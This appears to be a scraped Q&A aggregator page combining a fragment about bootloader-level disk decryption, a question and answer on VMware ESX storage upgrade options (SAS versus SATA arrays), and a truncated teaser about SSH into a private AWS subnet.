I understand for all practical purposes this encryption method is safe and there is no way (unless the password is actually saved there or something similarly stupid) to find information on how to decrypt the partitions using the small unencrypted /boot partition, as opposed to having an unencrypted swap partition which could potentially reveal data to help decrypt a partition. The reason I am looking into a solution like this is more practical.



I assume something like this would need to be started from the disk's boot block (mbr or otherwsise), or possibly chainloaded. It probably requires some functionality added to the bootloader, grub for example, to prompt for a password and use it to open the partitions so those can be read.



I did some research trying to find solutions, but I have not yet found one that works, or even if it may work, it's not practical at all (especially with a 100+ user base).

Thursday, April 6, 2017

VMWare ESX Storage Upgrade solutions



Current situation:




  • 2xESX 3.5 (Soon to be vSphere)

  • 2xESXi 3.5




All four servers are running standalone. The two ESX servers are beginning to run out of hard drive space but still doing very well on the processing and memory fronts. We're not running any external iSCSI or SAN storage for the servers at all.



The ESX servers are also running Ultra320 SCSI drives which are beginning to get very pricey at low storage rates ($550 for 300GB!), so I want to shy away from just throwing more 'small' drives at the ESX servers knowing the hard drives will become rarer with time in the event of drive failure.



What is probably the best solution? Right now I'm looking at the DroboPros which will allow for more growth over a longer period of time, which looks nice for budgets, or at a Dell Poweredge 2950 with 2TB of storage (using 3 bays out of 6 in RAID 5) but still room to grow since it runs SATA for around $3400.



I'm also looking at trying to get vCenter and vMotion, but would there be any advantages to the above two solutions over each other? By switching to external storage I'm hoping to not have to replace these servers until they are maxed out on RAM usage or the CPU load is finally too great.



Update




I will be going with either the PowerEdge bumped up to support SAS drives or a PowerVault with SAS, with the intention to end up running our VMWare from the external storage. The DroboPro is nice but not a long term solution. Here's hoping I get the PowerVault!



Thanks for the great answers everyone!


Answer



If you have any plans at all to scale out your ESX cluster, and it sounds like you are as you're considering vmotion and vcenter, you do need to pay attention to your I/O channel. SATA is OK for one or two servers pounding it, but if you ever plan to go past two it won't scale well without serious engineering.



Unfortunately, 'serious engineering', costs a lot of money. As do SAS-based arrays. In the long run, SAS will give you good performance for longer on an equivalent amount of disk. The SATA architecture doesn't handle massively random I/O as well as SCSI based disks (of which SAS is one). You can compensate for this in array hardware with larger caches to help de-randomize the I/O, but there will still be that fundamental limit at the base. There is a reason the big array vendors suggest that SATA drives not be used in an 'online' capacity (ESX hosts, file-servers) and instead suggest 'nearline' (Backup-to-disk, email archive, that kind of thing).


linux - How to SSH to ec2 instance in VPC private subnet via NAT server

I have created a VPC in aws with a public subnet and a private subnet. The private subnet does not have direct access to external network. S...